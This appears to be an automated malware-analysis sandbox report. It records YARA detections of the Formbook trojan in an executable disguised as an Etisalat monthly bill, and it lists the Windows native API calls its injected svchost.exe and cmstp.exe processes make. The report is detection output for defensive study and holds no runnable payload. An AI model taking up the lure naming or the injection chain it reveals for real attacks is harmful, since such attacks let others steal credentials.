          Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4443389899.0000000010977000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Details of Your Etisalat Summary Bill for the Month of May 2024.exe PID: 5772, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 4428, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmstp.exe PID: 1472, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B63B4C This is a third-party compiled AutoIt script.
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_5185667e-2)
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_53c69fd1-9)
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_992271cd-a)
          Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_dad4de33-9)
          Source: initial sample | Static PE information: Filename: Details of Your Etisalat Summary Bill for the Month of May 2024.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A350 NtCreateFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A400 NtReadFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A480 NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A530 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A47A NtClose
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A52A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B60 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F90 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FB0 NtResumeThread, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E80 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D30 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074340 NtSetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03074650 NtSuspendThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072BE0 NtQueryValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C60 NtCreateKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072C70 NtFreeVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03072CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073090 NtSetValueKey
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030735C0 NtCreateMutant
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030739B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03073D70 NtOpenThread
          Source: C:\Windows\explorer.exe | Code function: 3_2_10960E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe | Code function: 3_2_1095F232 NtCreateFile
          Source: C:\Windows\explorer.exe | Code function: 3_2_10960E0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72C60 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72BE0 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72B60 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D735C0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D74650 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D74340 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D72BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D73090 NtSetValueKey
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D73010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D73D70 NtOpenThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D73D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_04D739B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5A350 NtCreateFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5A480 NtClose
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5A400 NtReadFile
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5A530 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5A47A NtClose
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_02E5A52A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC40B1: CreateFileW, _memset, DeviceIoControl, CloseHandle
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BB8858 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC545F ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B6E800
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B8DBB5
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B6E060
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BE804A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B74140
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B82405
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B96522
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B9267E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BE0665
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B8283A
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B76843
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B989DF
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B96A94
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BE0AE2
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B78A0E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC8B13
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BBEB07
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B8CD61
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B97006
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B73190
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B7710E
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B61287
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B833C7
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B8F419
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B75680
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B816C4
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B878D3
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B758C0
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B81BB8
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B99D05
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B6FE40
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B8BFE6
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00B81FD0
          Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_015E3670
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D9DB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E1AE
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041DC28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041DD91
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D596
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041DDB9
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041DF47
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031003E6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C02C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030100
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F41A2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031001AA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F81CC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064750
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305C6E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03100591
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4420
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F2446
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EE4F6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FAB40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F6BD7
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0310A9A6
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304A840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030268B8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E8F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03082F28
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03060F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E2F30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B4F40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BEFA0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03032FC8
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304CFE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FEE26
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040E59
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052E90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FCE93
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FEEDB
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304AD00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DCD1F
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03058DBF
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303ADE0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040C00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E0CB5
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030CF2
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F132D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302D34C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0308739A
